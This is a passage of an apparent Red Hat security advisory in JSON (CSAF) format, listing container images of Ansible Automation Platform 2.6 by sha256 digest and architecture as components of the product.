"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
